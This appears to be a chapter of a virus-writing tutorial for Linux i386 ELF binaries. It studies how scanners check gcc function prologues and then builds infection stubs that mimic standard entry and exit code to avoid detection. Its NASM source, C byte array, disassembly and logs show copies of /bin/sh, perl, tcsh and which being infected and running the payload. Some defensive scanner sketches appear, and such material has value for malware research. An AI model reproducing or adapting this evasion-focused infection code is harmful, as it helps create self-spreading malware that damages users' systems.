A person who is more than casually interested in computers should be well schooled in machine language, since it is a fundamental part of a computer.
Donald Knuth
The scanners in Turn the pages and Second scan check program layout for deviations. On a typical Linux distribution this yields good results since all programs are compiled and linked with the same set of tools. But there are legitimate reasons for executables to look different. Some rescue tools and non-free executables are linked statically to be independent of the target system. [1]
asmutils is a set of miscellaneous utilities written in assembly language, targeted on embedded systems and small distributions (e.g. installation or rescue disks); also it contains a small libc and a crypto library. It features the smallest possible size and memory requirements, the fastest speed, and offers fairly good functionality.
The next best approach is to follow the flow of control and verify visited code, starting from the entry point. Again this relies on a certain homogeneity of executables.
A very simple check is alignment. We handle that here and here. gcc(1) never starts functions on odd addresses. But neither VIT nor RST seems to care; both put the infection right after the last byte of the code segment.
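Seen from the scanner's side, the alignment test is a single bit operation. The following Python sketch is only an illustration; the helper names `is_odd_address` and `natural_alignment` are made up here and do not come from any of the scanners mentioned above.

```python
def is_odd_address(addr: int) -> bool:
    """True if a function start address is odd, which gcc(1) output never is."""
    return (addr & 1) == 1


def natural_alignment(addr: int) -> int:
    """Return the largest power of two that divides addr."""
    if addr <= 0:
        raise ValueError("address must be positive")
    # Isolate the lowest set bit; that bit is the natural alignment.
    return addr & -addr
```

An odd start address is a strong hint that the code was not emitted by the usual tool chain. The reverse does not hold: an even address proves nothing.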
The improved versions of patchEntryAddr in The entry point do a primitive check of the call to __libc_start_main. Since we leave the entry point unmodified we pass this test.
The next step is to check entry code of functions called by __libc_start_main, especially main. We are vulnerable to this.
patchEntryAddr 3.0 patches the call of __libc_start_main to invoke our virus code instead of main. To stay undetected our code should mimic the real thing. The disassembly of our first program shows everything we need to know. But then that listing was retrieved through heavy cheating.
To disassemble the main of a regular executable we extend the exercise of Disassemble it again, Sam. The script performs no error checking at all. Feeding it anything other than executables built by gcc(1) can have strange effects (like no output at all). There is also no limit on output length. In the examples below the Makefile building this document used head(1).
Command: src/stub_revisited/ndisasm.sh
#!/bin/sh
file=${1:-/bin/bash}
entry_point=$( od -j24 -An -td4 -N4 ${file} )
# 134512640 = 0x8048000
# 24 = offset to address of main in code of _start
main_point_ofs=$( expr ${entry_point} - 134512640 + 24 )
main=$( od -j${main_point_ofs} -An -td4 -N4 ${file} )
main_ofs=$( expr ${main} - 134512640 )
ndisasm -e ${main_ofs} -o ${main} -U ${file}
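The arithmetic of the first steps can be spelled out in Python. This is a sketch under the script's own assumptions: a 32-bit little-endian ELF file whose code is loaded at 0x8048000. The names `read_entry_point` and `vaddr_to_offset` are invented for this illustration.

```python
import struct

LOAD_BASE = 0x08048000  # 134512640, the base address the shell script assumes


def read_entry_point(header: bytes) -> int:
    """Return e_entry, the 4-byte field at offset 24 of a 32-bit ELF header."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if header[4] != 1 or header[5] != 1:
        raise ValueError("only 32-bit little-endian ELF is handled here")
    (entry,) = struct.unpack_from("<I", header, 24)
    return entry


def vaddr_to_offset(vaddr: int, base: int = LOAD_BASE) -> int:
    """Convert a virtual address to a file offset by subtracting the base."""
    if vaddr < base:
        raise ValueError("address lies below the assumed load base")
    return vaddr - base
```

Unlike the shell script, the sketch refuses input that is not a 32-bit little-endian ELF header. The fixed base address remains an assumption; a robust tool would read it from the program headers.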
First a simple test. Compare with above mentioned disassembly.
Output: out/redhat-linux-i386/stub_revisited/magic_elf.ndisasm
08048460 55 push ebp
08048461 89E5 mov ebp,esp
08048463 83EC0C sub esp,byte +0xc
08048466 6A03 push byte +0x3
08048468 6801800408 push dword 0x8048001
0804846D 6A01 push byte +0x1
0804846F E8A4FEFFFF call 0x8048318
08048474 31C0 xor eax,eax
08048476 89EC mov esp,ebp
08048478 5D pop ebp
A look at tmp/doing_it_in_c/e3/sh_infected.
Output: out/redhat-linux-i386/stub_revisited/sh_infected.ndisasm
080C1280 6880940508 push dword 0x8059480
080C1285 9C pushf
080C1286 60 pusha
080C1287 E804000000 call 0x80c1290
080C128C 61 popa
080C128D 9D popf
080C128E C3 ret
080C128F 90 nop
080C1290 55 push ebp
080C1291 89E5 mov ebp,esp
And this is plain /bin/bash.
Output: out/redhat-linux-i386/stub_revisited/sh.ndisasm
08059480 55 push ebp
08059481 89E5 mov ebp,esp
08059483 57 push edi
08059484 56 push esi
08059485 53 push ebx
08059486 83EC24 sub esp,byte +0x24
08059489 6A01 push byte +0x1
0805948B 68E0BA0C08 push dword 0x80cbae0
08059490 E8A3F9FFFF call 0x8058e38
08059495 83C410 add esp,byte +0x10
The first two instructions, making up three bytes, are constant. They are followed by an optional series of push instructions to save special registers. Then comes a sub esp to reserve space for local variables. This also seems to be constant: even the trivial program from In the language of mortals does not use local variables and still ends up with a sub.
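A scanner could test for the pattern just described with a few byte comparisons. The Python sketch below is a hypothetical illustration, not code from any real scanner. It accepts only the three register pushes seen in the listings above (edi, esi, ebx) and treats the sub esp as mandatory, which is an assumption drawn from these few samples.

```python
PROLOGUE = bytes([0x55, 0x89, 0xE5])    # push ebp; mov ebp,esp
SAVE_PUSHES = {0x53, 0x56, 0x57}        # push ebx; push esi; push edi
SUB_ESP = (bytes([0x83, 0xEC]),         # sub esp,imm8
           bytes([0x81, 0xEC]))         # sub esp,imm32


def looks_like_gcc_prologue(code: bytes) -> bool:
    """Check the first bytes of a function against the observed entry code."""
    if not code.startswith(PROLOGUE):
        return False
    pos = len(PROLOGUE)
    # Skip the optional run of register-saving pushes.
    while pos < len(code) and code[pos] in SAVE_PUSHES:
        pos += 1
    return code[pos:pos + 2] in SUB_ESP
```

Fed with the first bytes of the three listings, the check accepts both uninfected programs and rejects sh_infected, whose main begins with push dword.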
For the exit code of /bin/bash we need a better filter.
Command: src/stub_revisited/ndisasm_ret.sh
#!/bin/sh
( src/stub_revisited/ndisasm.sh "$@" 2>&1 ) \
| sed -e '/ret/q' \
| tail
Output: out/redhat-linux-i386/stub_revisited/sh_ret.ndisasm
08059B2C A12CB70C08 mov eax,[0x80cb72c]
08059B31 83EC0C sub esp,byte +0xc
08059B34 50 push eax
08059B35 E826030000 call 0x8059e60
08059B3A 8D65F4 lea esp,[ebp-0xc]
08059B3D 5B pop ebx
08059B3E 5E pop esi
08059B3F 5F pop edi
08059B40 5D pop ebp
08059B41 C3 ret
I call this weird. It seems that 0xc bytes are reserved on the stack just to stay unused. And why does one program use leave and the other pop ebp? A quote from the documentation of nasm [2]:
LEAVE ; C9 [186]
LEAVE destroys a stack frame of the form created by the ENTER instruction [3]. It is functionally equivalent to MOV ESP,EBP followed by POP EBP.
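Because of this equivalence, a tool that inspects exit code has to accept several encodings. The Python sketch below classifies the last bytes of a function; the table covers only the three variants that appear in this chapter, and the name `classify_epilogue` is made up for the illustration. It assumes the byte string ends with the ret itself.

```python
# Longer patterns come first so that "pop ebp; ret" does not shadow
# the four-byte variant, of which it is a suffix.
EPILOGUES = [
    ("mov esp,ebp; pop ebp; ret", bytes([0x89, 0xEC, 0x5D, 0xC3])),
    ("leave; ret", bytes([0xC9, 0xC3])),
    ("pop ebp; ret", bytes([0x5D, 0xC3])),
]


def classify_epilogue(code: bytes):
    """Return the name of the matching exit sequence, or None."""
    for name, pattern in EPILOGUES:
        if code.endswith(pattern):
            return name
    return None
```

Matching byte values is the easy part. Such a check says nothing about where the ret actually transfers control.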
I guess that we are safe on that front. It's easy to check the existence of fixed byte values at a certain location (the entry code). But I doubt whether a static scanner could really realize whether a given exit code is just a dummy. Or what instruction a ret effectively jumps to.
Let's examine the stack of In the language of mortals just after the sub was executed. Note that you don't have to quote character "$" in interactive gdb(1) sessions. Instead of "\$sp" you type plain "$sp" to reference the stack pointer.
Command: src/stub_revisited/stack.sh
#!/bin/sh
file=${1:-${TMP}/magic_elf/magic_elf}
gdb ${file} -q <<EOT
break *0x08048466
run
backtrace
printf "esp=%08x ebp=%08x\n", \$esp, \$ebp
x/3xw \$sp
x/3xw \$sp + 12
x/3xw \$sp + 24
x/3xw \$sp + 36
EOT
Output: out/redhat-linux-i386/stub_revisited/stack
(gdb) Breakpoint 1 at 0x8048466
(gdb) Starting program: /home/alba/virus-writing-HOWTO/tmp/redhat-linux-i386/magic_elf/magic_elf
Breakpoint 1, 0x08048466 in main ()
(gdb) #0 0x08048466 in main ()
#1 0x4003d316 in __libc_start_main (main=0x8048460 <main>, argc=1,
ubp_av=0xbffff6b4, init=0x80482e0 <_init>, fini=0x80484c0 <_fini>,
rtld_fini=0x4000d2fc <_dl_fini>, stack_end=0xbffff6ac)
at ../sysdeps/generic/libc-start.c:129
(gdb) esp=bffff63c ebp=bffff648
(gdb) 0xbffff63c: 0x08048441 0x080494f8 0x080495f8
(gdb) 0xbffff648: 0xbffff688 0x4003d316 0x00000001
(gdb) 0xbffff654: 0xbffff6b4 0xbffff6bc 0x080482f6
(gdb) 0xbffff660: 0x080484c0 0x00000000 0xbffff688
(gdb)
The program was stopped at address 0x8048466 in function main, which was called from __libc_start_main. We already encountered file ../sysdeps/generic/libc-start.c in Use the Source, Luke. Out of sheer curiosity, a look at line 129:
Command: src/stub_revisited/get_libc_start_main.sh
#!/bin/sh
output=${1:-src/stub_revisited/__libc_start_main}
stack=${2:-out/i386/stub_revisited/stack}
base_dir=$(
find /usr/src/redhat/SOURCES -maxdepth 1 -type d -name 'glibc-*'
)
# If the file is not in the place I'm used to on my machine
# we fall back to the copy shipped with this document.
# Forcing my usage of SRPMs gains nothing.
[ -d "${base_dir}" ] || exit 0
sed -n -e 's/:/ /g' -e 's/^ *at *//p' < ${stack} \
| ( read original_filename line_number
filename="${base_dir}/${original_filename#../}"
[ -e ${filename} ] || exit 0
start=$( expr ${line_number} - 8 )
end=$( expr ${line_number} + 4 )
( echo "# ${filename}"
echo ""
nl -ba -p ${filename} | sed -n -e "${start},${end} p"
) > ${output}
)
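The sed expression in this script only extracts the file name and line number from the "at file:line" part of the backtrace. The same step, together with the window of eight lines before and four lines after, can be sketched in Python. The function names are hypothetical, and the regular expression assumes the "at" clause sits on a line of its own, as in the gdb(1) output shown above.

```python
import re


def parse_at_line(backtrace: str):
    """Return (filename, line_number) from a line like 'at file.c:129'."""
    match = re.search(r"^\s*at\s+(\S+):(\d+)\s*$", backtrace, re.MULTILINE)
    if match is None:
        return None
    return match.group(1), int(match.group(2))


def context_window(line_number: int, before: int = 8, after: int = 4):
    """Return the first and last line number of the excerpt to print."""
    return line_number - before, line_number + after
```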
Command: src/stub_revisited/__libc_start_main
# /usr/src/redhat/SOURCES/glibc-2.2.4/sysdeps/generic/libc-start.c
121 if (init)
122 (*init) ();
123
124 #ifdef SHARED
125 if (__builtin_expect (_dl_debug_mask & DL_DEBUG_IMPCALLS, 0))
126 _dl_debug_printf ("\ntransferring control: %s\n\n", argv[0]);
127 #endif
128
129 exit ((*main) (argc, argv, __environ));
130 }
Looks plausible.
The top three values on the stack are just random junk. The instruction just before our breakpoint decremented esp by 0xc = 12 to use that space for local variables. They are not initialized yet, though. Everything further down, including the next two values (saved ebp and return address), must be preserved for the host code. The three values after that are the arguments of main. We declared the function as plain main() so gdb(1) does not know about these identifiers. The next few values up to 0xbffff688 (saved ebp) are local variables of __libc_start_main.

Address | esp | ebp | Contents | Description |
---|---|---|---|---|
0xbffff63c | esp + 0 | ebp - 12 | 0x8048441 | random junk |
0xbffff640 | esp + 4 | ebp - 8 | 0x80494f8 | random junk |
0xbffff644 | esp + 8 | ebp - 4 | 0x80495f8 | random junk |
0xbffff648 | esp + 12 | ebp + 0 | 0xbffff688 | saved ebp |
0xbffff64c | esp + 16 | ebp + 4 | 0x4003d316 | return address |
0xbffff650 | esp + 20 | ebp + 8 | 0x1 | argc |
0xbffff654 | esp + 24 | ebp + 12 | 0xbffff6b4 | argv |
0xbffff658 | esp + 28 | ebp + 16 | 0xbffff6bc | environ |
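The offsets in this table follow mechanically from the two register values printed by gdb(1). A short Python sketch recomputes them from the session above; the function name `stack_rows` is made up, and the input words are copied from the x/3xw output.

```python
def stack_rows(esp: int, ebp: int, words):
    """Pair each 4-byte stack word with its offset from esp and from ebp."""
    rows = []
    for index, value in enumerate(words):
        address = esp + 4 * index
        rows.append((address, address - esp, address - ebp, value))
    return rows


# Values taken from the gdb session: esp=bffff63c ebp=bffff648
words = [0x08048441, 0x080494F8, 0x080495F8, 0xBFFFF688,
         0x4003D316, 0x00000001, 0xBFFFF6B4, 0xBFFFF6BC]

for address, esp_ofs, ebp_ofs, value in stack_rows(0xBFFFF63C, 0xBFFFF648, words):
    print(f"0x{address:08x}  esp{esp_ofs:+3d}  ebp{ebp_ofs:+4d}  0x{value:08x}")
```

The row where the ebp offset is zero holds the saved ebp. The return address sits four bytes above it and the arguments of main start at ebp + 8.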
The new stub must fulfill a few constraints.
Both entry code and exit code are fixed.
The stack below ebp + 0 must not be modified.
After executing infectious code it must jump to the original host code.
Original host code expects the value of esp to be 0xbffff64c and the value of ebp to be 0xbffff688 (values are not constant, just given for illustration).
If we keep original exit code then we must modify the stack. The simplest approach is to move the original ebp one position (4 bytes) down. Original entry code already reserved 12 unused bytes so we don't have to adjust esp. In the free space we store the address of host code.
Source: src/doing_it_in_c/i2/infection.asm
BITS 32
push ebp
mov ebp,esp
sub esp,byte 0xc
wrapper: ; replace -1 with address of original host code
mov eax,dword -1
xchg eax,[ebp]
sub ebp,byte 4
mov [ebp],eax
align 8
; dummy instruction to specify offset
push byte wrapper + 1
The following disassembly shows stub and the first function of the C part, called body. The stub ends with a few nop instructions to align its size. Flow of control just continues from stub to body. Since this is a regular C function it also has standard entry code. But this does not matter because standard exit code starts with a leave. No matter how much stuff was pushed on the stack between end of stub and exit code of body, the leave instruction will pop off the moved ebp. The following ret then jumps to host code.
Source: out/redhat-linux-i386/doing_it_in_c/e3i2.ndisasm
08049378 55 push ebp
08049379 89E5 mov ebp,esp
0804937B 83EC0C sub esp,byte +0xc
0804937E B8FFFFFFFF mov eax,0xffffffff
08049383 874500 xchg eax,[ebp+0x0]
08049386 83ED04 sub ebp,byte +0x4
08049389 894500 mov [ebp+0x0],eax
0804938C 90 nop
0804938D 90 nop
0804938E 90 nop
0804938F 90 nop
08049390 55 push ebp
08049391 89E5 mov ebp,esp
08049393 57 push edi
08049394 52 push edx
08049395 E82A000000 call 0x80493c4
0804939A 8D9000940408 lea edx,[eax+0x8049400]
080493A0 89D7 mov edi,edx
080493A2 FC cld
080493A3 31C0 xor eax,eax
080493A5 B9FFFFFFFF mov ecx,0xffffffff
080493AA F2AE repne scasb
080493AC F7D1 not ecx
080493AE 49 dec ecx
080493AF 51 push ecx
080493B0 52 push edx
080493B1 6A01 push byte +0x1
080493B3 6A04 push byte +0x4
080493B5 E81A000000 call 0x80493d4
080493BA 83C410 add esp,byte +0x10
080493BD 8B7DFC mov edi,[ebp-0x4]
080493C0 C9 leave
080493C1 C3 ret
Output: out/redhat-linux-i386/doing_it_in_c/e3i2/cc
Infecting copy of /bin/tcsh... wrote 168 bytes, Ok
Infecting copy of /usr/bin/perl... wrote 168 bytes, Ok
Infecting copy of /usr/bin/which... wrote 168 bytes, Ok
Infecting copy of /bin/sh... wrote 168 bytes, Ok
Output: out/redhat-linux-i386/doing_it_in_c/test-e3i2
ELF is dead baby, ELF is dead.
/home/alba/virus-writing-HOWTO/tmp/redhat-linux-i386/doing_it_in_c/e3i2/sh_infected
2.05.8(1)-release
/usr/bin/which
ELF is dead baby, ELF is dead.
/usr/bin/which
ELF is dead baby, ELF is dead.
tcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm
ELF is dead baby, ELF is dead.
ELF is dead baby, ELF is dead.
GNU bash, version 2.05.8(1)-release (i386-redhat-linux-gnu)
Copyright 2000 Free Software Foundation, Inc.
This is the same idea, only obfuscated by an intermediate call. Variations on this topic are endless.
Source: src/doing_it_in_c/i3/infection.asm
BITS 32
push ebp
mov ebp,esp
sub esp,byte 0xc
call wrapper
leave
ret
align 4
wrapper: ; replace -1 with address of original host code
mov eax,dword -1
xchg eax,[ebp]
sub ebp,byte 4
mov [ebp],eax
align 8
; dummy instruction to specify offset
push byte wrapper + 1
Source: out/redhat-linux-i386/doing_it_in_c/i3/infection.inc
const unsigned char Target::infection[]
__attribute__ (( aligned(8), section(".text") )) =
{
0x55, /* 00000000: push ebp */
0x89,0xE5, /* 00000001: mov ebp,esp */
0x83,0xEC,0x0C, /* 00000003: sub esp,byte +0xc */
0xE8,0x05,0x00,0x00,0x00, /* 00000006: call 0x10 */
0xC9, /* 0000000B: leave */
0xC3, /* 0000000C: ret */
0x90, /* 0000000D: nop */
0x90, /* 0000000E: nop */
0x90, /* 0000000F: nop */
0xB8,0xFF,0xFF,0xFF,0xFF, /* 00000010: mov eax,0xffffffff */
0x87,0x45,0x00, /* 00000015: xchg eax,[ebp+0x0] */
0x83,0xED,0x04, /* 00000018: sub ebp,byte +0x4 */
0x89,0x45,0x00, /* 0000001B: mov [ebp+0x0],eax */
0x90, /* 0000001E: nop */
0x90 /* 0000001F: nop */
};
enum { ENTRY_POINT_OFS = 0x11 };
Output: out/redhat-linux-i386/doing_it_in_c/e3i3/cc
Infecting copy of /bin/tcsh... wrote 192 bytes, Ok
Infecting copy of /usr/bin/perl... wrote 192 bytes, Ok
Infecting copy of /usr/bin/which... wrote 192 bytes, Ok
Infecting copy of /bin/sh... wrote 192 bytes, Ok
Output: out/redhat-linux-i386/doing_it_in_c/test-e3i3
ELF is dead baby, ELF is dead.
/home/alba/virus-writing-HOWTO/tmp/redhat-linux-i386/doing_it_in_c/e3i3/sh_infected
2.05.8(1)-release
/usr/bin/which
ELF is dead baby, ELF is dead.
/usr/bin/which
ELF is dead baby, ELF is dead.
tcsh 6.10.00 (Astron) 2000-11-19 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm
ELF is dead baby, ELF is dead.
ELF is dead baby, ELF is dead.
GNU bash, version 2.05.8(1)-release (i386-redhat-linux-gnu)
Copyright 2000 Free Software Foundation, Inc.
[1]
[2] http://www.octium.net/oldnasm/docs/nasmdoca.html#section-A.94
[3] http://www.octium.net/oldnasm/docs/nasmdoca.html#section-A.27